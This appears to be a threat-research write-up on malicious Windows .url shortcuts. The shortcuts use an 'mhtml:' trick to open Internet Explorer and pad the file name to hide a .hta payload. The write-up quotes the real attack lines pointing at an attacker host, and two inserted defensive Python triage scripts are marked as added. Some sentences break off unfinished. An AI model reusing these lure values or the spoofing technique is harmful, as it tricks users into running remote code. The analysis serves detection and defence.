Introduction and Background
Check Point Research recently discovered that threat actors have been using novel (or previously unknown) tricks to lure Windows users into remote code execution. Specifically, the attackers used special Windows Internet Shortcut files (.url extension), which, when clicked, call the retired Internet Explorer (IE) to visit the attacker-controlled URL. An additional IE trick is then used to hide the malicious .hta extension. By opening the URL with IE instead of the modern and much more secure Chrome/Edge browsers on Windows, the attacker gains significant advantages in exploiting the victim's computer, even though the computer is running the modern Windows 10/11 operating system. For some technical background, it's
The malicious .url samples we discovered could be dated back as early as
Resurrecting Internet Explorer via the “mhtml” Trick
Let's use the latest .url sample as an example. The content of the sample:

Figure 1: content of the malicious .url sample
As we can see, the last lines of the .url file point to a custom icon inside the Microsoft Edge executable msedge.exe. This makes the shortcut look like a PDF file (which, in fact, it is not).
Importantly, as we can see, the value of the URL keyword is quite different from the usual one. For common .url files, the URL parameter looks like URL= followed by an ordinary http or https address. In this sample, however, the value is:
Code:
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html
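A small triage script for .url files of this kind, added here as an example (it is not from the original post or from Check Point): it parses the shortcut, flags a URL= value that starts with mhtml: or carries an !x-usc: inner URL, notes an icon borrowed from msedge.exe, and pulls out the embedded http(s) targets for blocking or hunting. The sample .url content is constructed from the values quoted above; the IconFile path is an assumption.

```python
"""Triage a Windows Internet Shortcut (.url) for the "mhtml:" trick.
Example code added here; not from the original post or from Check Point."""
import re

# Constructed sample. The URL= value is the one quoted in the text; the
# IconFile line is an assumption mirroring the described msedge.exe icon.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html\r\n"
    "IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\r\n"
)
# Constructed benign shortcut for comparison.
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://example.test/\r\n"


def parse_url_file(text: str) -> dict:
    """Minimal INI reader for .url files: {section: {lower-case key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")  # split at the first '='
            sections[current][key.strip().lower()] = value.strip()
    return sections


def triage(text: str) -> dict:
    """Return whether the mhtml: trick is present, the embedded targets and findings."""
    shortcut = parse_url_file(text).get("InternetShortcut", {})
    url = shortcut.get("url", "")
    icon = shortcut.get("iconfile", "")
    findings = []
    mhtml = url.lower().startswith("mhtml:")
    if mhtml:
        findings.append("URL= starts with mhtml:, which hands the link to Internet Explorer")
    if "!x-usc:" in url.lower():
        findings.append("URL= carries an !x-usc: inner URL (same pattern as CVE-2021-40444)")
    if icon.lower().endswith("msedge.exe"):
        findings.append("IconFile borrows an icon from msedge.exe (document look-alike)")
    # Distinct http(s) URLs in order of appearance; '!' ends a URL so the
    # mhtml:...!x-usc:... wrapper is split into its two inner addresses.
    targets = []
    for t in re.findall(r"https?://[^\s!]+", url, re.IGNORECASE):
        if t not in targets:
            targets.append(t)
    return {"mhtml_trick": mhtml, "targets": targets, "findings": findings}


if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_URL_FILE), ("benign", BENIGN_URL_FILE)):
        print(name, triage(sample))
```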
A couple of years ago, we saw the same trick (which we call the "mhtml" trick) used in the infamous CVE-2021-40444 exploits.

Figure 2: key content in the CVE-2021-40444 exploit sample
We know the "mhtml" trick was previously used in Word documents when exploiting the CVE-2021-40444 vulnerability, and now we see the same trick used in a .url file. So, what could the attackers achieve by using this? Let's do some tests.
If we rename the sample to Books_A0UJKO.pdf.url (the name used in the wild), the .url file looks like the following on a fully patched Windows 11 system: it appears to be a link to a PDF file.

Figure 3: the malicious .url file appears as a link to a PDF file on Windows 11
If we act like the victim (who wants to open the PDF), we double-click the shortcut file. The victim then gets this:

Figure 4: IE and a prompt dialog appear when the victim double-clicks the .url file
See what's strange there? Internet Explorer is opened. In fact, with a little debugging, we were able to confirm that IE was indeed used to open the link http://cbmelipilla[.]cl/te/test1.html specified in the .url file.
As we know, Microsoft proclaimed IE retired and out-of-support.
Disclaimer: Even though IE has been proclaimed “retired and out-of-support,” technically speaking, IE is still part of the Windows OS and is “not inherently unsafe, as IE is still serviced for security vulnerabilities, and there should be no known exploitable security vulnerabilities,” according to our communications with Microsoft.
So, by default, a website should not be opened with IE unless the user specifically asks for it, with full knowledge of what is happening.
However, in this sample, with the “mhtml” trick, when the victim opens the .url shortcut (the victim thinks he/she is opening a PDF), the attacker-controlled website is being opened with IE, rather than the typical Chrome/Edge.
From there (the website being opened with IE), the attacker could do many bad things, because IE is insecure and outdated. For example, if the attacker has an IE zero-day exploit, which is much easier to find than one for Chrome/Edge, the attacker could attack the victim and gain remote code execution immediately. However, in the samples we analyzed, the threat actors didn't use any IE remote code execution exploit. Instead, they used another IE trick, which to the best of our knowledge was not publicly known before, to trick the victim into running the attacker's code, thereby giving the attacker remote code execution.
Additional IE Trick – Hiding the .hta Extension Name
Let's review the previous figure again (highlighted below). According to the IE prompt dialog, it appears to ask the user to open a PDF file named Books_A0UJKO.pdf.
Figure 5: a closer look at the IE dialog – showing the PDF filename only
However, is this the real case here? Do you think you’re opening a PDF?
Not really. If we click "Open" (the default option) in the above IE dialog, we get another prompt (see the following). This is because of IE's Protected Mode (a relatively weak browser sandbox).

Figure 6: IE Protected Mode warning dialog
If the victim continues to ignore the warning (as the victim thinks he/she is opening a PDF), the victim's machine is eventually compromised: the "opened" file is actually a malicious .hta file that is downloaded and executed.
If we look closely at the HTTP traffic, we find many non-printable characters appended to the end of the Books_A0UJKO.pdf string. At the very end comes the .hta string: this is the real (and dangerous) extension name.

Figure 7: the HTTP traffic showing the full URI visited
This is exactly the reason why the IE dialog didn’t show the .hta file name to the user. The real full URL is:
Code:
https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta
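As an added example (not from the original post or from Check Point), the following decodes a URL of this shape and recovers the name the dialog would display, the padding characters and the real extension. The sample URL is constructed from the pattern shown above, with %E2%A0%80 decoding to U+2800 (BRAILLE PATTERN BLANK), a character that renders as empty space.

```python
"""Recover the true extension hidden behind blank-rendering padding in a URL.
Example code added here; not from the original post or from Check Point."""
import unicodedata
from urllib.parse import unquote, urlsplit

# Constructed sample modelled on the URL quoted in the text (26 repetitions
# of %E2%A0%80 between the displayed "pdf" and the real "hta" extension).
SAMPLE_URL = "https://cbmelipilla.cl/te/Books_A0UJKO.pdf" + "%E2%A0%80" * 26 + ".hta"
BENIGN_URL = "https://example.test/docs/report.pdf"  # constructed, no padding


def is_filler(ch: str) -> bool:
    """True for characters a dialog shows as nothing or as blank space:
    whitespace, control/format/separator characters, non-ASCII symbols."""
    cat = unicodedata.category(ch)
    return ch.isspace() or cat[0] in "CZ" or (not ch.isascii() and cat == "So")


def reveal_hidden_extension(url: str) -> dict:
    """Split the last path segment into displayed name, padding and real extension."""
    name = unquote(urlsplit(url).path).rsplit("/", 1)[-1]  # percent-decoded file name
    stem, _, true_ext = name.rpartition(".")               # real extension is after the last '.'
    end = len(stem)
    while end and is_filler(stem[end - 1]):                # peel filler off the end of the stem
        end -= 1
    displayed, padding = stem[:end], stem[end:]
    _, _, displayed_ext = displayed.rpartition(".")
    return {
        "displayed_name": displayed,
        "displayed_extension": displayed_ext,
        "true_extension": true_ext,
        "padding_count": len(padding),
        "padding_codepoints": sorted({f"U+{ord(c):04X}" for c in padding}),
        # Suspicious when padding exists and the visible extension lies about the real one.
        "suspicious": bool(padding) and displayed_ext.lower() != true_ext.lower(),
    }


if __name__ == "__main__":
    for u in (SAMPLE_URL, BENIGN_URL):
        print(reveal_hidden_extension(u))
```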